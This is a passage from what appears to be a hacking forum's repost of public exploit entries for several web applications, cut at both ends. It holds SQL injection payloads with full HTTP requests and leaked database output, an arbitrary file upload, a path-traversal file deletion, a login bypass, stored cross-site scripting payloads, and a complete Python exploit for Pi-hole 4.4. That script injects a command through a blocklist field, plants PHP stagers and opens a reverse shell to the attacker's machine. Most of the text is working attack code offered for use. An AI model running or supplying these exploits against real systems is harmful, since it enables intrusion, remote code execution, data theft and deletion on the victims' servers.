pid=-6157%27%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7170627071,0x6d7a6346644349635a495a424c56644c51666866664553794e674764546a6c67747a69634749516a,0x7176626a71),NULL,NULL,NULL,NULL,NULL--%20RXWN
  13. HireHackking

    Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online AgroCulture Farm Management System 1.0 - 'uname' SQL Injection # Date: 2020-05-06 # Exploit Author: Tarun Sehgal # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/farm_management_system_in_php_with_source_code.zip # Version: 1.0 # Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 --------------------------------------------------------------------------------- #parameter Vulnerable: uname # Injected Request #Below request will print database name and MariaDB version. POST /fms/Login/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 204 Origin: http://localhost Connection: close Referer: http://localhost/fms/index.php Cookie: PHPSESSID=fiiiu7pq9kvhdr770ahd7dejco Upgrade-Insecure-Requests: 1 uname=admin' OR (SELECT 1935 FROM(SELECT COUNT(*),CONCAT(database(),(SELECT (ELT(1935=1935,1))),0x3a,version(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- dqgD&pass=admin&category=1 ----------------------------------------------------------------------------------------------------------------------------- #Response HTTP/1.1 302 Found Date: Wed, 06 May 2020 13:21:36 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.5 X-Powered-By: PHP/7.4.5 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache location: error.php Content-Length: 356 Connection: close Content-Type: text/html; charset=UTF-8 <b>Warning</b>: mysqli_query(): (23000/1062): Duplicate entry 'agroculture1:10.4.11-MariaDB1' for key 'group_key' in <b>
  14. HireHackking

    Kartris 1.6 - Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Kartris 1.6 - Arbitrary File Upload # Dork: N/A # Date: 2020-05-08 # Exploit Author: Nhat Ha - Sun CSR # Vendor Homepage: https://www.cactusoft.com/ # Software Link: https://www.kartris.com/ # Version: 1.6 # Category: Webapps # Tested on: WiN10_x64/KaLiLinuX_x64 # CVE: N/A # POC: https://localhost/Admin/_GeneralFiles.aspx # POST /Admin/_GeneralFiles.aspx HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------9604487443072642880454762058 Content-Length: 18484 Origin: 192.168.1.1 Connection: close Referer: https://192.168.1.1/Admin/_GeneralFiles.aspx Cookie: __cfduid=d1e56d596943226c869a1186e06b8d8661588757096; ASP.NET_SessionId=abbnm4jh04wmdbl2gukr5t5w; KartrisBasket870c8=s=7i7lpj21819; KartrisBackAuth870c8=xxxxxxxxxxxxx Upgrade-Insecure-Requests: 1 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="scrManager_HiddenField" ;;AjaxControlToolkit, Version=4.1.7.123, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e:en-GB:57898466-f347-4e5c-9527-24f201596811:475a4ef5:5546a2b:d2e10b12:effe2a26:37e2e5c9:1d3ed089:751cdd15:dfad98a5:497ef277:a43b07eb:3cf12cf1; -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_ExpandState" cccccccccc -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_SelectedNode" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="_UC_CategoryMenu_tvwCategory_PopulateLog" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$scrManager" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$filUploader"; filename="malicious.aspx" Content-Type: text/plain [Content Malicious File Here ! ] -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth" 170px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth" 500px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTTARGET" ctl00$phdMain$lnkUpload -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTARGUMENT" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATE" 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 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 54DD7DF0 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED" -----------------------------9604487443072642880454762058-- # Access malicious file following the link: https://localhost/uploads/General/malicious.aspx # How to fix: Update the latest version # Commit fix: https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c
  15. HireHackking

    Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python3 # Pi-hole <= 4.4 RCE # Author: Nick Frichette # Homepage: https://frichetten.com # # Note: This exploit must be run with root privileges and port 80 must not be occupied. # While it is possible to exploit this from a non standard port, for the sake of # simplicity (and not having to modify the payload) please run it with sudo privileges. # Or setup socat and route it through there? import requests import sys import socket import _thread import time if len(sys.argv) < 4: print("[-] Usage: sudo ./cve.py *Session Cookie* *URL of Target* *Your IP* *R Shell Port*") print("\nThis script will take 5 parameters:\n Session Cookie: The authenticated session token.\n URL of Target: The target's url, example: http://192.168.1.10\n Your IP: The IP address of the listening machine.\n Reverse Shell Port: The listening port for your reverse shell.") exit() SESSION = dict(PHPSESSID=sys.argv[1]) TARGET_IP = sys.argv[2] LOCAL_IP = sys.argv[3] LOCAL_PORT = sys.argv[4] # Surpress https verify warnings # I'm asuming some instances will use self-signed certs requests.packages.urllib3.disable_warnings() # Payload taken from http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet # I opted to use the Python3 reverse shell one liner over the full PHP reverse shell. shell_payload = """<?php shell_exec("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"%s\\\",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\"/bin/sh\\",\\"-i\\"]);'") ?> """ %(LOCAL_IP, LOCAL_PORT) root_payload = """<?php shell_exec("sudo pihole -a -t") ?> """ def send_response(thread_name): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((LOCAL_IP,int(80))) sock.listen(5) connected = False while not connected: conn,addr = sock.accept() if thread_name == "T1": print("[+] Received First Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") elif thread_name == "T2": print("[+] Received Second Callback") print("[+] Uploading Root Payload") conn.sendall(bytes(root_payload, "utf-8")) elif thread_name == "T3": print("[+] Received Third Callback") conn.sendall(b"HTTP/1.1 200 OK\n\nstuff\n") else: print("[+] Received Fourth Callback") print("[+] Uploading Shell Payload") conn.sendall(bytes(shell_payload, "utf-8")) conn.close() connected = True sock.close() _thread.start_new_thread(send_response,("T1",)) # Fetch token resp = requests.get(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, verify=False) response = str(resp.content) token_loc = response.find("name=\"token\"") token = response[token_loc+20:token_loc+64] # Make request with token data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o fun.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Root Stager Success") # Update gravity resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(3) _thread.start_new_thread(send_response,("T2",)) # Update again to trigger upload of root redirect resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(1) _thread.start_new_thread(send_response,("T3",)) data = {"newuserlists":"http://"+LOCAL_IP+"#\" -o teleporter.php -d \"","field":"adlists","token":token,"submit":"saveupdate"} resp = requests.post(TARGET_IP+"/admin/settings.php?tab=blocklists", cookies=SESSION, data=data, verify=False) if resp.status_code == 200: print("[+] Put Shell Stager Success") resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) time.sleep(1) _thread.start_new_thread(send_response,("T4",)) resp = requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/gravity.sh.php", cookies=SESSION, verify=False) print("[+] Triggering Exploit") try: requests.get(TARGET_IP+"/admin/scripts/pi-hole/php/fun.php", cookies=SESSION, timeout=3, verify=False) except: # We should be silent to avoid filling the cli window None
  16. HireHackking

    CuteNews 2.1.2 - Arbitrary File Deletion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion # Date: 2020-05-08 # Author: Besim ALTINOK # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 (Maybe it affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description: ------------------------------------------------------------------------ In the "Media Manager" area, users can do arbitrarily file deletion. Because the developer did not use the unlink() function as secure. So, can be triggered this vulnerability by a low user account Arbitrary File Deletion PoC -------------------------------------------------------------------------------- POST /cute/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ********************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 222 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/cute/index.php Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022 Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
  17. HireHackking

    Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Sentrifugo CMS 3.2 - Persistent Cross-Site Scripting # Dork: N/A # Date: 2020-05-06 # Exploit Author: Vulnerability-Lab # Vendor: http://www.sentrifugo.com/ # Link: http://www.sentrifugo.com/download # Version: 3.2 # Category: Webapps # CVE: N/A Document Title: =============== Sentrifugo v3.2 CMS - Persistent XSS Web Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2229 Product & Service Introduction: =============================== http://www.sentrifugo.com/ http://www.sentrifugo.com/download Affected Product(s): ==================== Sentrifugo Product: Sentrifugo v3.2 - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-05: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the official Mahara v19.10.2 CMS web-application series. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `expense_name` parameters of the `/expenses/expenses/edit` module in the `index.php` file. Remote attackers with low privileges are able to inject own malicious persistent script code as expenses entry. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. Entries of expenses can be reviewed in the backend by higher privileged accounts as well. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] index.php/expenses/expenses/edit Vulnerable Input(s): [+] Expenses Name Vulnerable File(s): [+] index.php Vulnerable Parameter(s): [+] expense_name Affected Module(s): [+] index.php/expenses/expenses Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Vulnerable Source <div id="maincontentdiv"> <div id="dialog-confirm" style="display:none;"> <div class="newframe-div"> <div class="new-form-ui height32"> <div class="division"> <input type="text" maxlength="12" id="number_value" name="number_value"></div> <span class="errors" id="errors-contactnumber"></span></div></div></div> <div id="empstatus-alert" style="display:none;"> <div class="newframe-div"><div id="empstatusmessage"></div></div></div> <div id="empleaves-alert" style="display:none;"> <div class="newframe-div"><div id="empleavesmessage"></div></div></div> --- PoC Session Logs [POST] --- (Expenses Inject) http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Host: sentrifugo.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 352 Origin: http://sentrifugo.localhost:8080 Connection: keep-alive Referer: http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Cookie: PHPSESSID=h67jk6dashpvgn5n3buc6uia87; _ga=GA1.2.788961556.1587849443; _gid=GA1.2.1158360779.1587849443 id=&limit=&offset=&parameter=all&currencyid=1&file_original_names=&file_new_names=&last_inserted_receipts=&receiptId=&expense_Id=& expense_name=<img src="evil.source" onload=alert(document.domain)>&category_id=&project_id=&expense_date=&expense_currency_id=2& expense_amount=&cal_amount=0&is_from_advance=&expense_payment_id=&expense_payment_ref_no=&trip_id=&description=&post_receipt_ids=&submit=Save - POST: HTTP/1.1 200 OK Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.3.10-1ubuntu3.10 Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 19284 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html Reference(s): http://sentrifugo.localhost:8080/index.php http://sentrifugo.localhost:8080/index.php/expenses http://sentrifugo.localhost:8080/index.php/expenses/expenses/ http://sentrifugo.localhost:8080/index.php/expenses/expenses/edit Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  18. HireHackking

    Complaint Management System 1.0 - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: complaint management system 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-10 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: Attacker can bypass login page and access to dashboard page # vulnerable file : admin/index.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/Complaint%20Management%20System/admin/ POST /Complaint%20Management%20System/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Referer: http://localhost/Complaint%20Management%20System/admin/ Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4 Connection: keep-alive Upgrade-Insecure-Requests: 1 username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
  19. HireHackking

    Victor CMS 1.0 - 'post' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Victor CMS 1.0 - 'post' SQL Injection # Google Dork: N/A # Date: 2020-05-09 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: # The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page. # vulnerable file : post.php http://localhost/CMSsite-master/post.php?post=1 Parameter: post (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: post=1 AND 2333=2333 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/CMSsite-master/post.php?post=sqli http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g Connection: keep-alive Upgrade-Insecure-Requests: 1 post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
  20. HireHackking

    OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting # Date: 2020-05-11 # Exploit Author: Vulnerability-Lab # Vendor: https://www.openz.de/ # https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2234 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.openz.de/ https://www.openz.de/download.html Affected Product(s): ==================== OpenZ Product: OpenZ v3.6.60 - ERP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-06: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official OpenZ v3.6.60 ERP web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the `inpname` and `inpdescripción` parameters of the `Employee` add/register/edit module in the `menu.html` file. Remote attackers with low privileges are able to inject own malicious persistent script code as name or description. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. The attack can be triggered from low privilege user accounts against higher privilege user accounts like manager or administrators to elevate privileges via session hijacking. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Employee Vulnerable Input(s): [+] Mitarbeiter Name [+] Beschreibung Vulnerable File(s): [+] Menu.html Vulnerable Parameter(s): [+] inpname [+] inpdescription Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the openz web-application 2. Register, add or edit via profile settings the inpname & inpdescription parameter inputs 3. Edit inpname & inpdescription parameter of the profile and save the entry Note: The execute occurs on preview of the user credentials in the 